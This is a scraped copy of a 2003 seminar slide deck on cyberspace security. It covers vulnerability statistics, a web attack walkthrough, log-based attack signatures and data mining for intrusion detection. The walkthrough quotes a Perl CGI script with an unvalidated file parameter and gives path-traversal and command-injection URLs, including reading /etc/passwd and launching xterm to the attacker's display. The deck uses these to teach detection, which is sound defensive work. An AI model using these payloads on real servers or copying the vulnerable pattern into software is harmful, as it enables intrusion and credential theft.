• No results found

Cyberspace Security Issues and Challenges

N/A
N/A
Info
Download
Protected

Academic year: 2021

Share "Cyberspace Security Issues and Challenges"

Copied!
8
0
0

Loading.... (view fulltext now)

Download now ( 8 Page )

Full text

(1)

MSU Seminar, 10/06/03 M. Malek 1

Cyberspace Security Issues and Challenges

Manu Malek, Ph.D.

Department of Computer Science

Stevens Institute of Technology

[email protected]

MSU Seminar, 10/06/03 M. Malek 2

Outline

™ Security status

™ Security vulnerabilities

™ A Web attack example

™ Attack signatures

™ Data mining for intrusion detection

™ Sources of security problems

(2)

MSU Seminar, 10/06/03 M. Malek 3

Security Status

Year 1990 1992 1994 1996 1998 2000 5000 10,000 15,000 20,000 25,000 Password cracking Self-replicating code Exploiting known vulnerabilities Disabling audits Back doors/ Trojan horses Sniffers DDOS Technical knowledge required of attacker Password guessing Internet worms

Based on data from CERT/CC (www.cert.org)

Reported intrusions

Security Status

(cont’d)

™ Results of a 2002 survey conducted by FBI and Computer

Security Institute (CSI, http://www.gocsi.com/):

¾ 507 (530 in 2001) US companies participated.

¾ 90% (64% in 2001) detected computer security breaches within

the past 12 months.

¾ 74% cited their Internet connections as a frequent point of attack. ¾ 34% reported the intrusions to law enforcement agencies.

™ Financial aspects[Forrester Research]:

¾ Reported average US company loss from virus attacks:

• $45M in 1999 • $244M in 2001

(3)

MSU Seminar, 10/06/03 M. Malek 5

Top 10 Security Vulnerabilities

1. Remote Procedure Calls (RPC) 2. Apache Web Server

3. Secure Shell (SSH)

4. Simple Network Management Protocol (SNMP)

5. File Transfer Protocol (FTP) 6. R-Services - Trust Relationships 7. Line Printer Daemon (LPD) 8. Sendmail

9. BIND/DNS

10. General Unix Authentication - Accounts with No Passwords or Weak Passwords 1. Internet Information Services (IIS)

2. Microsoft Data Access Components (MDAC) - Remote Data Services 3. Microsoft SQL Server

4. NETBIOS - Unprotected Windows Networking Shares

5. Anonymous Logon - Null Sessions 6. LAN Manager Authentication - Weak

LM Hashing

7. General Windows Authentication -Accounts with No Passwords or Weak Passwords

8. Internet Explorer 9. Remote Registry Access 10. Windows Scripting Host

Vulnerabilities of Unix Systems Vulnerabilities of Windows Systems

Source: The SANS Institute (http://www.sans.org/top20/), May 2003

MSU Seminar, 10/06/03 M. Malek 6

A Web Attack - introduction

™ For many web applications, a client needs to send information to

the web server using the Form element.

™ If the attribute Method of Form is set to GET, the values

inputted by the client user are concatenated with the URL, e.g., http://www.acme.com?customer=

John+Doe&address=101+Main+Street&cardno= 1234567890&cc=visacard

™ This feature could be abused by hackers to attack the web

(4)

MSU Seminar, 10/06/03 M. Malek 7

A Web Attack Scenario

*

™A visitor to the web site www.acme.com begins browsing the site,

viewing the site’s main page, and viewing a picture by clicking on a link.

™The corresponding URL in the browser window shows:

http://www.acme.com/index.cgi?page=sunset.html

™Following this pattern, the visitor types the URL

http://www.acme.com/index.cgi?page=index.cgi requesting the file index.cgi.

™If the parameters passed to the index.cgi script are not validated,

the source code of the index.cgi script will be displayed! * Adopted from S. McClure, S. Shah, and S. Shah, Web Hacking: Attacks and Defenses, Addison Wesley, 2003

The First Vulnerability

™The index.cgi script:

01: #!/usr/bin/perl

02: # Perl script to display a page back as requested by the argument 03: require “../cgi-bin/cgi-lib.pl”; 04: &ReadParse (*input); 08: $filename = $input{page}; 09: if ($filename eq “ ”) { 10: $filename = “main.html”; 11: } 12: print &PrintHeader;

13: $filename = “/usr/local/apache/htdocs/” . $filename; 14: open (FILE, $filename);

15: while (<FILE>) { 16: print $_; 17: }

18: close (FILE);

(5)

MSU Seminar, 10/06/03 M. Malek 9

™ The visitor (now attacker) then tries to retrieve arbitrary files from the

server, e.g., the /etc/passwd file, by typing the following URL in the browser window:

http://www.acme.com/index.cgi?page=/../../etc/passwd

™ If permissions are not set properly on the file, its contents will be

displayed by the browser.

™ The attacker could try to execute arbitrary commands on the web

server, e.g., by sending

http://www.acme.com/index.cgi?page=|ls+- la/%0aid%0awhich+xterm

(% plus the hex character 0a indicates line feed) requesting

¾ ls –al (to show a file list of the server’s root directory) ¾ id (the id of the process running index.cgi)

¾ which xterm (path to the xterm binary code, to gain interactive shell access

to the server)

™ The attacker could follow it with

http://www.acme.com/index.cgi?page=|xterm+- display+10.0.1.21:0.0

The Second Vulnerability

MSU Seminar, 10/06/03 M. Malek 10

Server Logs

™ Every visit to a web site by a user creates a record of what

happens during the session in the server's logs.

™ Some typical logs:

¾ Access Logrecords every transaction between the web server and

the browser (date, time, domain name or IP address, size of transaction, …).

¾ Referrer Log Filerecords the visitor’s path to the site (the initial URL from which the visitor came)

(6)

MSU Seminar, 10/06/03 M. Malek 11

Attack Signatures

™An attack signature encapsulates the way an attacker would

navigate through the resources, and the actions the attacker would take.

™To illustrate, let us look at the log lines in the Access Log for the

Web attack example just described:

¾ The log line corresponding to the visitor’s first attempt is

(A) 10.0.1.21 – [31/Oct/2001:03:02:47] “GET / HTTP” 200 3008

¾ The log line corresponds to the visitor’s selection of the sunset picture is

(B) 10.0.1.21 – [31/Oct/2001:03:03:18] “GET / sunset.jpg HTTP” 200 36580 ¾ The log line corresponds to the visitor’s first attempt at surveillance of the

site (issuing a request for index.cgi) is

(C) 10.0.1.21 – [31/Oct/2001:03:05:31] “GET / index.cgi?page= index.cgi HTTP” 200 358

™ The following log lines correspond to the visitor (by now, attacker)

attempting to open supposedly secure files:

(D) 10.0.1.21 – [31/Oct/2001:03:06:21] “GET / index.cgi?page=/../../etc/passwd HTTP” 200 723

(E) 10.0.1.21 – [31/Oct/2001:03:07:01] “GET / index.cgi?page=|ls+-la+/%0aid%0awhich+xterm HTTP” 200 1228

™ The following sequences of log lines constitutes the signature of this

attack:

¾ A-B-C-D-E ¾ A-C-D-E

¾ B-C-D-E

¾ C-D-E

™ Even the individual log line E could provide a tell-tale sign of an

(7)

MSU Seminar, 10/06/03 M. Malek 13

Data Mining for Intrusion Detection

™ Data mining techniques have been used in intrusion detection (e.g., see

[1]).

™ Examples of such techniques are:

– Using sequences of system calls issued by a process (e.g., see [2]):

Such methods are specific to certain processes and cannot detect generic intrusion attempts.

– Artificial intelligence techniques (e.g., see [3]):

Such methods suffer from slow processing and lack of scalability.

[1] W. Lee and S. J. Stolfo, “Data Mining Approaches for Intrusion Detection,” Usenix Security Symposium, San Antonio, Texas, July 1998

[2] S. A. Hofmeyr, A. Somayaji, and S. Forrest, "Intrusion Detection using Sequences of System Calls," Journal of

Computer Security, Vol. 6, pp. 151-180, 1998

[3] Zhen Liu, German Florez, and Susan Bridges, “A Comparison of Input Representation in Neural Networks: A Case Study in Intrusion Detection,” Proc. International Joint Conference on Neural Networks, May 12-17, 2002, Honolulu, Hawaii

MSU Seminar, 10/06/03 M. Malek 14

Mining Logs

™ The data available in log files can be “mined” to find attack signatures. ™ There are many data mining tools on the market for this purpose, e.g.,

¾ Clementine(Integral Solutions Ltd.) ¾ DBMiner

¾ Polyanalyst (Megaputer)

¾ Ripper (AT&T)

™ Our tool selection criteria were efficiency, portability, and extensibility. ™ We use the Enterprise Data-Miner (EDM) (from

http://www.data-miner.com).

¾ EDM is a comprehensive collections of programs for efficient mining of large

amounts of data.

¾ It includes Rule Induction Kit (RIK), a module that supports creation of

(8)

MSU Seminar, 10/06/03 M. Malek 15

Sources of Security Problems

™ Buggy software design and development

¾ Programming for security not generally taught

¾ Good software engineering processes not universal ¾ Existence of legacy code

™ System administration

¾ Too many machines to administer

¾ Too many platforms and applications to support

¾ Too many updates and patches to apply ¾ Inadequate policies and procedures

™ Availability of new “hacking” technologies

¾ Vulnerabilities are quickly and widely published ¾ Scripts and tools are downloadable

Conclusions

™ Internet and Web pose security issues due to their “openness.”

™ Operating systems vulnerabilities, especially buffer overflow,

are major targets of attack.

™ Data mining techniques can be used effectively for detecting

attacks.

™ Determining the relevance/importance of log records, and

defining intelligent signatures for attacks are critical.

™ Education, and using better programming practices help in

References

Download now ( PDF - 8 Page - 188.96 KB )

Related documents

WALL MOUNTED type INVERTER MULTI AIR CONDITIONER RSM-7LA RSM-9LA RSM-12LA ROM-18LA2. Models CONTENTS

THERMISTOR ( PIPE TEMP. ) FAN MOTOR CAPACITOR STEPPING MOTOR CONT RO L B OAR D PO W ER SUP PL Y BO ARD TRANS FO RME R BO AR D DI SP LA Y FAN MO TO R BLACK GRAY GRAY

Demand Forecasting: An Open-Source Approach

The insights drawn from using different models and comparing MAPE scores not only benefits the overall demand planning outcome but gives us an opportunity to dig deeper

Enhanced Data Availability and Business Continuity with the IBM TS7700 and Brocade 7840 Extension Solution

The defining features that bring value to Brocade Extension in IBM TS7700 Grid environments include Extension Hot Code Load (HCL), Extension Trunking, WAN-Optimized TCP (WO-TCP),

Spatio-temporal Consistency and Negative Label Transfer for 3D freehand US Segmentation

Given the difficulties of manually annotating such difficult sequences, we present a FCN model and a training strategy that rely on incomplete 2-D annotations, where only some of

Promotion of energy-efficient heat pump dryers

Today the energy label does not represent the fact that heat pump dryers – efficiency class A – are twice as efficient as conventional condenser dryers,

Dictation System. User Manual for Physicians. Transcription

Physician residents and fellows may utilize the Fraser Health dictation system as directed and under the guidance of the preceptor physician overseeing their residency. • The

The Key to a Successful SEO Sales Strategy (the Long Tail)

• As Geographical, International and Local SEO are also Long Tail strategies, LSPs can also leverage their presence in different countries and offices by:. – Utilizing

Inhibition of weld corrosion in flowing brines containing carbon dioxide

Below, Figure 10-4 shows a comparison of the self corrosion rates in the present study for the weld regions under uninhibited conditions over a wide range of temperatures